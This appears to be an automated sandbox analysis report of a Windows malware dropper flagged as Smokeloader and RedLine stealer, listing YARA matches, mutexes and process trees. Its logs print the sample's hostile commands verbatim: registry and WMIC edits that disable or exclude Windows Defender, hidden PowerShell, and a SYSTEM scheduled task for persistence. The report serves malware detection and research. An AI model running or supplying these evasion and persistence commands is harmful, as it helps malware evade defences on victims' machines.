Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3593010	0_2_00007FF7E3593010
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35957F0	0_2_00007FF7E35957F0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358F7F4	0_2_00007FF7E358F7F4
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A2700	0_2_00007FF7E35A2700
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3597F10	0_2_00007FF7E3597F10
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3577EC0	0_2_00007FF7E3577EC0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3598D40	0_2_00007FF7E3598D40
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A3600	0_2_00007FF7E35A3600
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358FDA0	0_2_00007FF7E358FDA0
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004162A6	18_2_004162A6
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040E5A5	18_2_0040E5A5
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004126B0	18_2_004126B0
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00403A01	18_2_00403A01
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00418EF1	18_2_00418EF1
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00418FCB	18_2_00418FCB

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C

Found potential string decryption / allocating functions

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89C89 appears 69 times
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89C56 appears 419 times
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89CBF appears 115 times
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: String function: 00413954 appears 179 times
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: String function: 00007FF7E3579B60 appears 51 times

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028

PE / OLE file has an invalid certificate

Source: lgX7lgUL1w.exe

Static PE information: invalid certificate

PE file contains executable resources (Code or Archives)

Source: 6up3Hll278RsXeDsUnv7AmsU.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: H0hJPxhIO3F6BQNxVzuoHmfd.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: 3wIIRe1QiHmGmyDfkt1MdfjR.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: xHjBfoMXM1Bms4i9lirVpf5B.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: v0F2dmnMQ8GuOxPTeGs09I9Y.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: GEHqSaIn1rPu3OTaMO2vs7UL.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: IMmyv1eSkv8WoF4sKRLh3j87.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: bVGflEGYToK4vU6iMb86uQ6v.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: hmtNBhlQWScQGAc2r9fH2laz.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: LAD11vkv57kHfnlhAFxxWdEz.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression

Sample file is different than original file name gathered from version info

Source: lgX7lgUL1w.exe	Binary or memory string: OriginalFilename vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1212207092.00000233C0572000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7774000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213026892.00000233C4800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Yara signature match

Source: lgX7lgUL1w.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@173/255@0/54

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

0_2_00007FF7E3582890

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Code function: 8_2_030225B2 CreateToolhelp32Snapshot,Module32First,

8_2_030225B2

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_15
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8028
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8188:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrsojfea.jbs.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

Source: lgX7lgUL1w.exe

Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File read: C:\Users\user\Desktop\lgX7lgUL1w.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lgX7lgUL1w.exe "C:\Users\user\Desktop\lgX7lgUL1w.exe"
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"	Jump to behavior
